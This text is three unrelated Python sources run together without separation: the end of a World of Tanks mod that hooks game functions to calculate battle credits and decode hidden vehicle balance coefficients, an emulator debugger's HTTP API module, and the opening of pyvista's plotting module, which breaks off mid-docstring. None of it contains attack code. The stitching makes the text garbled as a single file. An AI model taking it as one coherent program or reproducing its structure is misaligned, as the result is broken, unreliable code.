кого # '17161425606': None, #49409 ussr_R61_Object252_BF lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=49409 #ИС-6 Черный # '15471993030': None, #44545 ussr_R119_Object_777 lvl:9 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=44545 #Объект 777 Вариант II, в разработке # '10581530310': None, #30465 ussr_R172_Object_752 lvl:9 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=30465 #Объект 752, в разработке # '21251630790': None, #61185 ussr_R119_Object_777C lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=61185 #Объект 777 Вариант II С, в разработке # '17517095622': None, #50433 ussr_R129_Object_257 lvl:10 
coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=50433 #Объект 257 (П), только КИТАЙ # AT-SPG # '21607300806': None, #62209 ussr_R121_KV4_KTT lvl:8 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=62209 #КВ-4 КТТС По слухам полностью отмененный танк, но присутствует в ангаре у многих старых супер тестеров # '17606013126': None, #50689 ussr_R126_Object_730_5 lvl:10 coeff:0.0 !!!!PREMIUM https://premomer.org/tank.php?id=50689 #Объект 268 вариант 5, Этого танка нет ни у кого }) class p__Flash(object): def p__startBattle(self): if not p__config.p__data['battle_show']: return if not p__g_flash: return p__g_flash.createComponent('credits', p__COMPONENT_TYPE.PANEL, { 'x' : p__config.p__data['battle_x'], 'y' : p__config.p__data['battle_y'], 'width' : 1, 'height': 1, 'drag' : True, 'border': True, 'alignX': p__COMPONENT_ALIGN.LEFT, 'alignY': p__COMPONENT_ALIGN.BOTTOM}) p__g_flash.createComponent('credits.text', p__COMPONENT_TYPE.LABEL, { 'shadow': {"distance": 0, "angle": 0, "color": 0x000000, "alpha": 1, "blurX": 1, "blurY": 1, "strength": 1, "quality": 1}, 'text' : '', 'width': 168, 'height': 25, 'index': 1, 'multiline': True, 'tooltip': '+1000 or -1000 it\'s normal calc\nIf calc incorrect, play battle without damage to fix it.\nFull time replays, no escape!!!'}) if p__config.p__data['battle_background']: p__g_flash.createComponent('credits.image', p__COMPONENT_TYPE.IMAGE, { 'width': 168, 'height': 25, 'index': 0, 'image': '../maps/icons/quests/inBattleHint.png'}) p__COMPONENT_EVENT.UPDATED += self.p__update def p__stopBattle(self): if not p__config.p__data['battle_show']: return if not p__g_flash: return p__COMPONENT_EVENT.UPDATED -= self.p__update p__g_flash.deleteComponent('credits.text') if p__config.p__data['battle_background']: p__g_flash.deleteComponent('credits.image') p__g_flash.deleteComponent('credits') def p__update(self, alias, props): if not p__config.p__data['battle_show']: return if str(alias) == str('credits'): x = int(props.get('x', p__config.p__data['battle_x'])) if x and x != int(p__config.p__data['battle_x']): p__config.p__data['battle_x'] = x y = int(props.get('y', p__config.p__data['battle_y'])) if y and y != int(p__config.p__data['battle_y']): p__config.p__data['battle_y'] = y p__config.p__apply(p__config.p__data) # p__g_flash.updateComponent('credits.text', p__data) # print '%s Flash coordinates updated : y = %i, x = %i, props: %s' % (alias, p__config.p__data['battle_y'], p__config.p__data['battle_x'], props) def setCreditsText(self, text, width=0, height=0): if not p__config.p__data['battle_show']: return if not p__g_flash: return data = {'visible': True, 'text': text} if width: data['width'] = width if height: data['width'] = height p__g_flash.updateComponent('credits.text', data) def p__visible(self, status): if not p__config.p__data['battle_show']: return p__g_flash.updateComponent('credits', {'visible': status}) class p__BattleResultParser(object): def __init__(self): self.p__Threads = True self.p__ArenaIDQueue = p__Queue() self.ResultsCache = [] self.ResultsAvailable = p__threading.Event() self.thread = p__threading.Thread(target=self.WaitResult) self.thread.setDaemon(True) self.thread.setName('WaitResult') self.thread.start() def CheckCallback(self, ArenaUniqueID, ErrorCode, battleResults): if ErrorCode in [-3, -5]: p__BigWorld.callback(1.0, lambda: self.p__ArenaIDQueue.put(ArenaUniqueID)) elif ErrorCode >= 0: if ArenaUniqueID in self.ResultsCache: return p__calc.p__receiveBattleResult(True, battleResults) # print battleResults.get('arenaUniqueID') # 
print battleResults.get('personal') # print battleResults.get('common') def WaitResult(self): while self.p__Threads: ArenaUniqueID = self.p__ArenaIDQueue.get() self.ResultsAvailable.wait() try: p__BigWorld.player().battleResultsCache.get(ArenaUniqueID, p__partial(self.CheckCallback, ArenaUniqueID)) except Exception as e: pass p__config = p__Config() p__flashInHangar = flashInHangar() p__flash = p__Flash() p__calc = p__CreditsCalculator() p__results = p__BattleResultParser() def p__hook_start_battle(*args): if p__BigWorld.player().arena.bonusType == p__ARENA_BONUS_TYPE.REGULAR: p__calc.p__timer() p__hooked_start_battle(*args) def p__hook_before_delete(*args): if p__BigWorld.player().arena.bonusType == p__ARENA_BONUS_TYPE.REGULAR: p__calc.p__stopBattle() p__hooked_before_delete(*args) def p__hook_CrewMeta_as_tankmenResponseS(self, p__data): if p__g_currentVehicle.item: try: status = p__g_currentVehicle.itemsCache.items.stats.activePremiumExpiryTime > 0 except Exception as e: status = False try: p__calc.p__getHangarData(status) except Exception as e: print 'ERROR: creditCalc crew:', e return p__hooked_CrewMeta_as_tankmenResponseS(self, p__data) def p__hook_onBattleEvents(self, events): p__hooked_onBattleEvents(self, events) if p__BigWorld.player().arena.bonusType == p__ARENA_BONUS_TYPE.REGULAR: p__calc.p__onBattleEvents(events) def p__hook_LobbyPopulate(self): p__hooked_LobbyPopulate(self) p__BigWorld.callback(3.0, p__calc.p__hangarMessage) def p__hook_BattleResultsFormatter_format(self, message, *args): arenaUniqueID = message.data.get('arenaUniqueID', 0) p__results.p__ArenaIDQueue.put(arenaUniqueID) return p__hooked_BattleResultsFormatter_format(self, message, *args) def p__onAccountBecomePlayer(): p__results.ResultsAvailable.set() def p__IntoBattle(): p__results.ResultsAvailable.clear() p__hooked_start_battle = p__PlayerAvatar._PlayerAvatar__startGUI p__hooked_before_delete = p__PlayerAvatar._PlayerAvatar__destroyGUI p__hooked_onBattleEvents = p__PlayerAvatar.onBattleEvents p__hooked_CrewMeta_as_tankmenResponseS = p__CrewMeta.as_tankmenResponseS p__hooked_LobbyPopulate = p__LobbyView._populate p__hooked_BattleResultsFormatter_format = p__BattleResultsFormatter.format p__PlayerAvatar._PlayerAvatar__startGUI = p__hook_start_battle p__PlayerAvatar._PlayerAvatar__destroyGUI = p__hook_before_delete p__PlayerAvatar.onBattleEvents = p__hook_onBattleEvents p__CrewMeta.as_tankmenResponseS = p__hook_CrewMeta_as_tankmenResponseS p__LobbyView._populate = p__hook_LobbyPopulate p__BattleResultsFormatter.format = p__hook_BattleResultsFormatter_format p__g_playerEvents.onBattleResultsReceived += p__calc.p__receiveBattleResult p__g_playerEvents.onAvatarReady += p__IntoBattle p__g_playerEvents.onAccountBecomePlayer += p__onAccountBecomePlayer def fini(): p__results.p__Threads = False def p__jsonGenerator(nations): from CurrentVehicle import g_currentVehicle as p__g_currentVehicle import ResMgr as p__ResMgr import os as p__os import codecs as p__codecs import json as p__json p__COEFFICIENTS = {} resMgr = p__ResMgr.openSection('../version.xml') if resMgr is None: resMgr = p__ResMgr.openSection('version.xml') if resMgr is None: resMgr = p__ResMgr.openSection('./version.xml') ver = 'temp' if resMgr is None else resMgr.readString('version') i1 = ver.find('.') i2 = ver.find('#') p__PATH = ''.join(['./res_mods/', ver[i1 + 1:i2 - 1], '/system/']) if p__os.path.isfile(p__PATH + 'sw_templates.json'): try: with p__codecs.open(p__PATH + 'sw_templates.json', 'r', encoding='utf-8-sig') as p__json_file: p__data = 
p__json_file.read().decode('utf-8-sig') p__COEFFICIENTS.update(p__calc.p__byte_ify(p__json.loads(p__data))) p__json_file.close() except Exception as e: p__COEFFICIENTS.update({}) def p__deCode(p__compactDescr): test = '%s' % (p__compactDescr * 2847 * 122) if test in p__COEFFICIENTS: return test, round(p__COEFFICIENTS[test] / 1231 / 487 * 0.0001, 6) return test, 0.0 items = p__g_currentVehicle.itemsCache.items.getVehicles() def getData(nation, role, found): text = '' for level in xrange(1, 11): for compactDescr in items: vehicle = items[compactDescr] if vehicle.nationName == nation and vehicle.descriptor.level == level and vehicle.type == role: vehicleCompDesc, balanceCoeff = p__deCode(compactDescr) thatPremium = ' !!!!PREMIUM' if vehicle.isPremium or vehicle.isPremiumIGR else '' details = '#%s %s lvl:%s coeff:%s%s' % (compactDescr, vehicle.name.replace(':', '_'), vehicle.descriptor.level, balanceCoeff, thatPremium) if not found and not balanceCoeff: text += "#'%s': %s, %s https://premomer.org/tank.php?id=%s\n" % (vehicleCompDesc, None, details, compactDescr) if found and balanceCoeff: text += "'%s': %s, %s\n" % (vehicleCompDesc, p__COEFFICIENTS[vehicleCompDesc], details) if text: print '# %s' % role print text if not nations: nations = ['ussr', 'germany', 'uk', 'japan', 'usa', 'china', 'france', 'czech', 'sweden', 'poland', 'italy'] roles = ['lightTank', 'mediumTank', 'heavyTank', 'AT-SPG', 'SPG'] print '########################### DATA ###########################' for nation in nations: print '# %s' % nation for role in roles: getData(nation, role, True) print '$$$$$$$$$$$$$$$$$$$$$$$$$$$ DATA $$$$$$$$$$$$$$$$$$$$$$$$$$$' for nation in nations: print '# %s' % nation for role in roles: getData(nation, role, False) print '!!!!!!!!!!!!!!!!!!!!!!!!!!! DONE !!!!!!!!!!!!!!!!!!!!!!!!!!!' p__BigWorld.flashInHangar = p__flashInHangar
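# --- Illustrative sketch (not part of the original mod) ---
# The coefficient tables above are stored obfuscated, mirroring p__deCode()
# inside p__jsonGenerator(): each key is str(compactDescr * 2847 * 122) and
# each value is the balance coefficient scaled by 1231 * 487 * 10000
# (= 5994970000). A minimal standalone decoder under that assumption:

def decode_coefficient_entry(key, value):
    """Return (compactDescr, coefficient) for one obfuscated table entry."""
    compact_descr = int(key) // (2847 * 122)
    coefficient = round(value / 1231.0 / 487.0 * 0.0001, 6)
    return compact_descr, coefficient

# Example: decode_coefficient_entry('18878644902', 8392958000) -> (54353, 1.4),
# matching the "# 54353 uk_GB51_Excelsior lvl:5 coeff:1.4" entry above.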
debugger.py
'''
Debugger to show Aldebaran's internal state
'''
import json
import logging
import threading
from http import HTTPStatus
from urllib.parse import urlparse, parse_qs

from instructions.operands import WORD_REGISTERS, operand_to_str
from utils import config
from utils import utils
from utils.errors import ArchitectureError, AldebaranError
from utils.utils import GenericRequestHandler, GenericServer
from hardware.memory.memory import SegfaultError


logger = logging.getLogger(__name__)


class Debugger:
    '''
    Debugger

    API endpoints:
        GET /api/internal
        GET /api/memory?offset=&length=
        POST /api/cpu/step
    '''

    def __init__(self, host, port):
        self._server = GenericServer((host, port), GenericRequestHandler, self._handle_get, self._handle_post)
        self._input_thread = threading.Thread(target=self._server.serve_forever)
        self._user_log = []
        self.cpu = None
        self.clock = None
        self.memory = None
        self.architecture_registered = False

    def register_architecture(self, cpu, clock, memory):
        '''
        Register other internal devices
        '''
        self.cpu = cpu
        self.clock = clock
        self.memory = memory
        self.architecture_registered = True

    def start(self):
        '''
        Start input thread
        '''
        if not self.architecture_registered:
            raise ArchitectureError('Debugger cannot run without registering architecture')
        logger.info('Starting...')
        self._input_thread.start()
        logger.info('Started.')

    def stop(self):
        '''
        Stop input thread
        '''
        logger.info('Stopping...')
        self._server.shutdown()
        self._server.server_close()
        self._input_thread.join()
        logger.info('Stopped.')

    def user_log(self, message):
        '''
        Append message to user log
        '''
        self._user_log.append(message)

    def _handle_get(self, path):
        '''
        Handle incoming GET request from Debugger frontend, called by GenericRequestHandler
        '''
        parse_result = urlparse(path)
        path = parse_result.path
        query = parse_qs(parse_result.query)
        if path == '/api/internal':
            return self._get_internal_state()
        if path == '/api/memory':
            try:
                offset = int(query.get('offset')[0], 16)
            except Exception:
                offset = 0
            try:
                length = int(query.get('length')[0], 16)
            except Exception:
                length = 256
            return self._get_memory(offset, length)
        return (
            HTTPStatus.BAD_REQUEST,
            {
                'error': 'Unknown path',
            }
        )

    def _get_internal_state(self):
        registers = {
            name: utils.word_to_str(self.cpu.registers.get_register(name, silent=True))
            for name in WORD_REGISTERS
        }
        registers['IP'] = utils.word_to_str(self.cpu.ip)
        registers['entry_point'] = utils.word_to_str(self.cpu.system_addresses['entry_point'])
        if self.cpu.last_ip is not None:
            last_instruction = self._get_instruction(self.cpu.last_ip)
            last_ip = utils.word_to_str(self.cpu.last_ip)
        else:
            last_instruction = None
            last_ip = None
        if self.cpu.shutdown:
            next_instruction = None
            next_ip = None
        else:
            next_instruction = self._get_instruction(self.cpu.ip)
            next_ip = utils.word_to_str(self.cpu.ip)
        return (
            HTTPStatus.OK,
            {
                'registers': registers,
                'stack': self._get_stack(),
                'cpu': {
                    'halt': self.cpu.halt,
                    'shutdown': self.cpu.shutdown,
                    'last_instruction': last_instruction,
                    'last_ip': last_ip,
                    'next_instruction': next_instruction,
                    'next_ip': next_ip,
                },
                'clock': {
                    'cycle_count': self.clock.cycle_count,
                },
                'user_log': self._user_log,
            }
        )

    def _get_memory(self, offset, length):
        if offset >= config.memory_size or offset < 0:
            return (
                HTTPStatus.BAD_REQUEST,
                {
                    'error': 'Cannot access memory beyond 0000-{}'.format(utils.word_to_str(config.memory_size - 1)),
                }
            )
        if offset + length > config.memory_size:
            length = config.memory_size - offset
        first_address = offset
        content = []
        for idx in range(length):
            try:
                content.append(utils.byte_to_str(self.memory.read_byte(first_address + idx)))
            except SegfaultError:
                content.append(None)
        return (
            HTTPStatus.OK,
            {
                'first_address': utils.word_to_str(first_address),
                'last_address': utils.word_to_str(first_address + length - 1),
                'content': content,
            }
        )

    def _get_stack(self):
        bottom_of_stack = self.cpu.system_addresses['bottom_of_stack']
        first_address = max(self.cpu.registers.get_register('SP', silent=True) - 7, 0)
        length = bottom_of_stack - first_address + 1
        return {
            'first_address': utils.word_to_str(first_address),
            'last_address': utils.word_to_str(bottom_of_stack),
            'content': [
                utils.byte_to_str(self.memory.read_byte(first_address + idx))
                for idx in range(length)
            ],
        }

    def _get_instruction(self, ip):
        inst_opcode, operand_buffer = self.cpu.read_instruction(ip)
        try:
            instruction = self.cpu.parse_instruction(inst_opcode, operand_buffer)
        except AldebaranError:
            return None
        last_idx = 0
        operands = []
        for op, idx in zip(instruction.operands, instruction.operand_buffer_indices):
            operands.append({
                'name': operand_to_str(op),
                'opcode': utils.binary_to_str(operand_buffer[last_idx:idx]),
            })
            last_idx = idx
        return {
            'name': instruction.__class__.__name__,
            'opcode': utils.byte_to_str(inst_opcode),
            'operands': operands,
        }

    def _handle_post(self, path, headers, rfile):
        '''
        Handle incoming POST request from Debugger frontend, called by GenericRequestHandler
        '''
        parse_result = urlparse(path)
        path = parse_result.path
        try:
            request_body_length = int(headers.get('Content-Length'))
        except TypeError:
            return (HTTPStatus.LENGTH_REQUIRED, None)
        data = rfile.read(request_body_length)
        try:
            data = json.loads(data)
        except json.decoder.JSONDecodeError:
            return (
                HTTPStatus.BAD_REQUEST,
                {
                    'error': 'Could not parse data.',
                }
            )
        if path == '/api/cpu/step':
            self.clock.debugger_queue.put({
                'action': 'step',
                'data': data,
            })
        return (
            HTTPStatus.OK,
            {}
        )
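# --- Illustrative client sketch (not part of the original module) ---
# The Debugger above serves its API via GenericServer on the (host, port)
# passed to __init__. The handlers accept GET /api/internal,
# GET /api/memory?offset=<hex>&length=<hex> and POST /api/cpu/step, and are
# assumed to return their (status, dict) results serialized as JSON.
# The base URL below is a hypothetical placeholder; minimal stdlib-only usage:

if __name__ == '__main__':
    import json
    from urllib.request import Request, urlopen

    base_url = 'http://localhost:8000'  # placeholder host/port, not from the source

    # Full internal state: registers, stack, halt/shutdown flags,
    # last/next instruction, clock cycle count, user log
    with urlopen(base_url + '/api/internal') as response:
        print(json.load(response))

    # 256 bytes of memory from offset 0; parameters are hex strings,
    # matching int(..., 16) in _handle_get()
    with urlopen(base_url + '/api/memory?offset=0000&length=0100') as response:
        print(json.load(response))

    # Single-step the CPU; the body must be valid JSON (see _handle_post())
    request = Request(
        base_url + '/api/cpu/step',
        data=json.dumps({}).encode('utf-8'),
        headers={'Content-Type': 'application/json'},
        method='POST',
    )
    with urlopen(request) as response:
        print(json.load(response))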
plotting.py
"""PyVista plotting module.""" import collections.abc import ctypes from functools import wraps import io import logging import os import pathlib import platform import textwrap from threading import Thread import time from typing import Dict import warnings import weakref import numpy as np import scooby import pyvista from pyvista import _vtk from pyvista.utilities import ( abstract_class, assert_empty_kwargs, convert_array, get_array, is_pyvista_dataset, numpy_to_texture, raise_not_matching, wrap, ) from ..utilities.misc import PyvistaDeprecationWarning from ..utilities.regression import image_from_window from ._plotting import _has_matplotlib, prepare_smooth_shading, process_opacity from .colors import Color, get_cmap_safe from .export_vtkjs import export_plotter_vtkjs from .mapper import make_mapper from .picking import PickingHelper from .render_window_interactor import RenderWindowInteractor from .renderer import Camera, Renderer from .renderers import Renderers from .scalar_bars import ScalarBars from .tools import FONTS, normalize, opacity_transfer_function, parse_font_family # noqa from .widgets import WidgetHelper SUPPORTED_FORMATS = [".png", ".jpeg", ".jpg", ".bmp", ".tif", ".tiff"] VERY_FIRST_RENDER = True # windows plotter helper # EXPERIMENTAL: permit pyvista to kill the render window KILL_DISPLAY = platform.system() == 'Linux' and os.environ.get('PYVISTA_KILL_DISPLAY') if KILL_DISPLAY: # pragma: no cover # this won't work under wayland try: X11 = ctypes.CDLL("libX11.so") X11.XCloseDisplay.argtypes = [ctypes.c_void_p] except OSError: warnings.warn('PYVISTA_KILL_DISPLAY: Unable to load X11.\nProbably using wayland') KILL_DISPLAY = False def close_all(): """Close all open/active plotters and clean up memory. Returns ------- bool ``True`` when all plotters have been closed. """ for _, p in _ALL_PLOTTERS.items(): if not p._closed: p.close() p.deep_clean() _ALL_PLOTTERS.clear() return True log = logging.getLogger(__name__) log.setLevel('CRITICAL') log.addHandler(logging.StreamHandler()) def _warn_xserver(): # pragma: no cover """Check if plotting is supported and persist this state. Check once and cache this value between calls. Warn the user if plotting is not supported. Configured to check on Linux and Mac OS since the Windows check is not quick. """ # disable windows check until we can get a fast way of verifying # if windows has a windows manager (which it generally does) if os.name == 'nt': return if not hasattr(_warn_xserver, 'has_support'): _warn_xserver.has_support = pyvista.system_supports_plotting() if not _warn_xserver.has_support: # check if a display has been set if 'DISPLAY' in os.environ: return # finally, check if using a backend that doesn't require an xserver if pyvista.global_theme.jupyter_backend in ['ipygany', 'pythreejs']: return # Check if VTK has EGL support ren_win_str = str(type(_vtk.vtkRenderWindow())) if 'EGL' in ren_win_str or 'OSOpenGL' in ren_win_str: return warnings.warn( '\n' 'This system does not appear to be running an xserver.\n' 'PyVista will likely segfault when rendering.\n\n' 'Try starting a virtual frame buffer with xvfb, or using\n ' ' ``pyvista.start_xvfb()``\n' ) USE_SCALAR_BAR_ARGS = """ "stitle" is a depreciated keyword and will be removed in a future release. Use ``scalar_bar_args`` instead. For example: scalar_bar_args={'title': 'Scalar Bar Title'} """ @abstract_class class BasePlotter(PickingHelper, WidgetHelper): """To be used by the Plotter and pyvistaqt.QtInteractor classes. 
Parameters ---------- shape : list or tuple, optional Number of sub-render windows inside of the main window. Specify two across with ``shape=(2, 1)`` and a two by two grid with ``shape=(2, 2)``. By default there is only one renderer. Can also accept a string descriptor as shape. E.g.: * ``shape="3|1"`` means 3 plots on the left and 1 on the right, * ``shape="4/2"`` means 4 plots on top and 2 at the bottom. border : bool, optional Draw a border around each render window. Default ``False``. border_color : color_like, optional Either a string, rgb list, or hex color string. For example: * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` border_width : float, optional Width of the border in pixels when enabled. title : str, optional Window title of the scalar bar lighting : str, optional What lighting to set up for the plotter. Accepted options: * ``'light_kit'``: a vtk Light Kit composed of 5 lights. * ``'three lights'``: illumination using 3 lights. * ``'none'``: no light sources at instantiation. The default is a Light Kit (to be precise, 5 separate lights that act like a Light Kit). theme : pyvista.themes.DefaultTheme, optional Plot-specific theme. """ mouse_position = None click_position = None def __init__( self, shape=(1, 1), border=None, border_color='k', border_width=2.0, title=None, splitting_position=None, groups=None, row_weights=None, col_weights=None, lighting='light kit', theme=None, ): """Initialize base plotter.""" log.debug('BasePlotter init start') self._theme = pyvista.themes.DefaultTheme() if theme is None: # copy global theme to ensure local plot theme is fixed # after creation. self._theme.load_theme(pyvista.global_theme) else: if not isinstance(theme, pyvista.themes.DefaultTheme): raise TypeError( 'Expected ``pyvista.themes.DefaultTheme`` for ' f'``theme``, not {type(theme).__name__}.' 
) self._theme.load_theme(theme) self.image_transparent_background = self._theme.transparent_background # optional function to be called prior to closing self.__before_close_callback = None self._store_image = False self.mesh = None if title is None: title = self._theme.title self.title = str(title) # add renderers self.renderers = Renderers( self, shape, splitting_position, row_weights, col_weights, groups, border, border_color, border_width, ) # This keeps track of scalars names already plotted and their ranges self._scalar_bars = ScalarBars(self) # track if the camera has been set up self._first_time = True # Keep track of the scale # track if render window has ever been rendered self._rendered = False # this helps managing closed plotters self._closed = False # lighting style; be forgiving with input (accept underscores # and ignore case) lighting_normalized = str(lighting).replace('_', ' ').lower() if lighting_normalized == 'light kit': self.enable_lightkit() elif lighting_normalized == 'three lights': self.enable_3_lights() elif lighting_normalized != 'none': raise ValueError(f'Invalid lighting option "{lighting}".') # Add self to open plotters self._id_name = f"{hex(id(self))}-{len(_ALL_PLOTTERS)}" _ALL_PLOTTERS[self._id_name] = self # Key bindings self.reset_key_events() log.debug('BasePlotter init stop') self._image_depth_null = None self.last_image_depth = None self.last_image = None self._has_background_layer = False # set hidden line removal based on theme if self.theme.hidden_line_removal: self.enable_hidden_line_removal() # set antialiasing based on theme if self.theme.antialiasing: self.enable_anti_aliasing() @property def theme(self): """Return or set the theme used for this plotter. Examples -------- Use the dark theme for a plotter. >>> import pyvista >>> from pyvista import themes >>> pl = pyvista.Plotter() >>> pl.theme = themes.DarkTheme() >>> actor = pl.add_mesh(pyvista.Sphere()) >>> pl.show() """ return self._theme @theme.setter def theme(self, theme): if not isinstance(theme, pyvista.themes.DefaultTheme): raise TypeError( 'Expected a pyvista theme like ' '``pyvista.themes.DefaultTheme``, ' f'not {type(theme).__name__}.' ) self._theme.load_theme(theme) def import_gltf(self, filename, set_camera=True): """Import a glTF file into the plotter. See https://www.khronos.org/gltf/ for more information. Parameters ---------- filename : str Path to the glTF file. set_camera : bool, optional Set the camera viewing angle to one compatible with the default three.js perspective (``'xy'``). Examples -------- >>> import pyvista >>> from pyvista import examples >>> helmet_file = examples.gltf.download_damaged_helmet() # doctest:+SKIP >>> texture = examples.hdr.download_dikhololo_night() # doctest:+SKIP >>> pl = pyvista.Plotter() # doctest:+SKIP >>> pl.import_gltf(helmet_file) # doctest:+SKIP >>> pl.set_environment_texture(cubemap) # doctest:+SKIP >>> pl.camera.zoom(1.8) # doctest:+SKIP >>> pl.show() # doctest:+SKIP See :ref:`load_gltf` for a full example using this method. 
""" if not _vtk.VTK9: # pragma: no cover from pyvista.core.errors import VTKVersionError raise VTKVersionError('Support for glTF requires VTK v9 or newer') filename = os.path.abspath(os.path.expanduser(str(filename))) if not os.path.isfile(filename): raise FileNotFoundError(f'Unable to locate {filename}') # lazy import here to avoid importing unused modules from vtkmodules.vtkIOImport import vtkGLTFImporter importer = vtkGLTFImporter() importer.SetFileName(filename) importer.SetRenderWindow(self.ren_win) importer.Update() # register last actor in actors actor = self.renderer.GetActors().GetLastItem() name = actor.GetAddressAsString("") self.renderer._actors[name] = actor # set camera position to a three.js viewing perspective if set_camera: self.camera_position = 'xy' def export_html(self, filename): """Export this plotter as an interactive scene to a HTML file. Parameters ---------- filename : str Path to export the html file to. Notes ----- You will need ``ipywidgets`` and ``pythreejs`` installed for this feature. Examples -------- >>> import pyvista >>> from pyvista import examples >>> mesh = examples.load_uniform() >>> pl = pyvista.Plotter(shape=(1,2)) >>> _ = pl.add_mesh(mesh, scalars='Spatial Point Data', show_edges=True) >>> pl.subplot(0,1) >>> _ = pl.add_mesh(mesh, scalars='Spatial Cell Data', show_edges=True) >>> pl.export_html('pyvista.html') # doctest:+SKIP """ pythreejs_renderer = self.to_pythreejs() # import after converting as we check for pythreejs import first try: from ipywidgets.embed import embed_minimal_html except ImportError: # pragma: no cover raise ImportError('Please install ipywidgets with:\n' '\n\tpip install ipywidgets') # convert and write to file embed_minimal_html(filename, views=[pythreejs_renderer], title=self.title) def to_pythreejs(self): """Convert this plotting scene to a pythreejs renderer. Returns ------- ipywidgets.Widget Widget containing pythreejs renderer. """ self._on_first_render_request() # set up camera from pyvista.jupyter.pv_pythreejs import convert_plotter return convert_plotter(self) def export_gltf(self, filename, inline_data=True, rotate_scene=True, save_normals=True): """Export the current rendering scene as a glTF file. Visit https://gltf-viewer.donmccurdy.com/ for an online viewer. See https://vtk.org/doc/nightly/html/classvtkGLTFExporter.html for limitations regarding the exporter. Parameters ---------- filename : str Path to export the gltf file to. inline_data : bool, optional Sets if the binary data be included in the json file as a base64 string. When ``True``, only one file is exported. rotate_scene : bool, optional Rotate scene to be compatible with the glTF specifications. save_normals : bool, optional Saves the point array ``'Normals'`` as ``'NORMALS'`` in the outputted scene. Examples -------- Output a simple point cloud represented as balls. >>> import numpy as np >>> import pyvista >>> point_cloud = np.random.random((100, 3)) >>> pdata = pyvista.PolyData(point_cloud) >>> pdata['orig_sphere'] = np.arange(100) >>> sphere = pyvista.Sphere(radius=0.02) >>> pc = pdata.glyph(scale=False, geom=sphere) >>> pl = pyvista.Plotter() >>> _ = pl.add_mesh(pc, cmap='reds', smooth_shading=True, ... show_scalar_bar=False) >>> pl.export_gltf('balls.gltf') # doctest:+SKIP >>> pl.show() Output the orientation plotter. 
>>> from pyvista import demos >>> pl = demos.orientation_plotter() >>> pl.export_gltf('orientation_plotter.gltf') # doctest:+SKIP >>> pl.show() """ if not _vtk.VTK9: # pragma: no cover from pyvista.core.errors import VTKVersionError raise VTKVersionError('Support for glTF requires VTK v9 or newer') if not hasattr(self, "ren_win"): raise RuntimeError('This plotter has been closed and is unable to export the scene.') from vtkmodules.vtkIOExport import vtkGLTFExporter # rotate scene to gltf compatible view if rotate_scene: for renderer in self.renderers: for actor in renderer.actors.values(): if hasattr(actor, 'RotateX'): actor.RotateX(-90) actor.RotateZ(-90) if save_normals: try: mapper = actor.GetMapper() if mapper is None: continue dataset = mapper.GetInputAsDataSet() if 'Normals' in dataset.point_data: # ensure normals are active normals = dataset.point_data['Normals'] dataset.point_data.active_normals = normals.copy() except: # noqa: E722 pass exporter = vtkGLTFExporter() exporter.SetRenderWindow(self.ren_win) exporter.SetFileName(filename) exporter.SetInlineData(inline_data) exporter.SetSaveNormal(save_normals) exporter.Update() # rotate back if applicable if rotate_scene: for renderer in self.renderers: for actor in renderer.actors.values(): if hasattr(actor, 'RotateX'): actor.RotateZ(90) actor.RotateX(90) def enable_hidden_line_removal(self, all_renderers=True): """Enable hidden line removal. Wireframe geometry will be drawn using hidden line removal if the rendering engine supports it. Disable this with :func:`disable_hidden_line_removal <BasePlotter.disable_hidden_line_removal>` Parameters ---------- all_renderers : bool If ``True``, applies to all renderers in subplots. If ``False``, then only applies to the active renderer. Examples -------- Create a side-by-side plotter and render a sphere in wireframe with hidden line removal enabled on the left and disabled on the right. >>> import pyvista >>> sphere = pyvista.Sphere(theta_resolution=20, phi_resolution=20) >>> pl = pyvista.Plotter(shape=(1, 2)) >>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe') >>> _ = pl.add_text("With hidden line removal") >>> pl.enable_hidden_line_removal(all_renderers=False) >>> pl.subplot(0, 1) >>> pl.disable_hidden_line_removal(all_renderers=False) >>> _ = pl.add_mesh(sphere, line_width=3, style='wireframe') >>> _ = pl.add_text("Without hidden line removal") >>> pl.show() """ if all_renderers: for renderer in self.renderers: renderer.enable_hidden_line_removal() else: self.renderer.enable_hidden_line_removal() def disable_hidden_line_removal(self, all_renderers=True): """Disable hidden line removal. Enable again with :func:`enable_hidden_line_removal <BasePlotter.enable_hidden_line_removal>` Parameters ---------- all_renderers : bool If ``True``, applies to all renderers in subplots. If ``False``, then only applies to the active renderer. Examples -------- Enable and then disable hidden line removal. >>> import pyvista >>> pl = pyvista.Plotter() >>> pl.enable_hidden_line_removal() >>> pl.disable_hidden_line_removal() """ if all_renderers: for renderer in self.renderers: renderer.disable_hidden_line_removal() else: self.renderer.disable_hidden_line_removal() @property def scalar_bar(self): """First scalar bar. Kept for backwards compatibility.""" return list(self.scalar_bars.values())[0] @property def scalar_bars(self): """Scalar bars. 
Examples -------- >>> import pyvista >>> sphere = pyvista.Sphere() >>> sphere['Data'] = sphere.points[:, 2] >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(sphere) >>> plotter.scalar_bars Scalar Bar Title Interactive "Data" False Select a scalar bar actor based on the title of the bar. >>> plotter.scalar_bars['Data'] # doctest:+SKIP (vtkmodules.vtkRenderingAnnotation.vtkScalarBarActor)0x7fcd3567ca00 """ return self._scalar_bars @property def _before_close_callback(self): """Return the cached function (expecting a reference).""" if self.__before_close_callback is not None: return self.__before_close_callback() @_before_close_callback.setter def _before_close_callback(self, func): """Store a weakref.ref of the function being called.""" if func is not None: self.__before_close_callback = weakref.ref(func) else: self.__before_close_callback = None @property def shape(self): """Shape of the plotter. Examples -------- Return the plotter shape. >>> import pyvista >>> plotter = pyvista.Plotter(shape=(2, 2)) >>> plotter.shape (2, 2) """ return self.renderers._shape @property def renderer(self): """Return the active renderer. Examples -------- >>> import pyvista >>> pl = pyvista.Plotter() >>> pl.renderer # doctest:+SKIP (Renderer)0x7f916129bfa0 """ return self.renderers.active_renderer @property def store_image(self): """Store last rendered frame on close. This is normally disabled to avoid caching the image, and is enabled by default by setting: ``pyvista.BUILDING_GALLERY = True`` Examples -------- >>> import pyvista >>> pl = pyvista.Plotter(off_screen=True) >>> pl.store_image = True >>> _ = pl.add_mesh(pyvista.Cube()) >>> pl.show() >>> 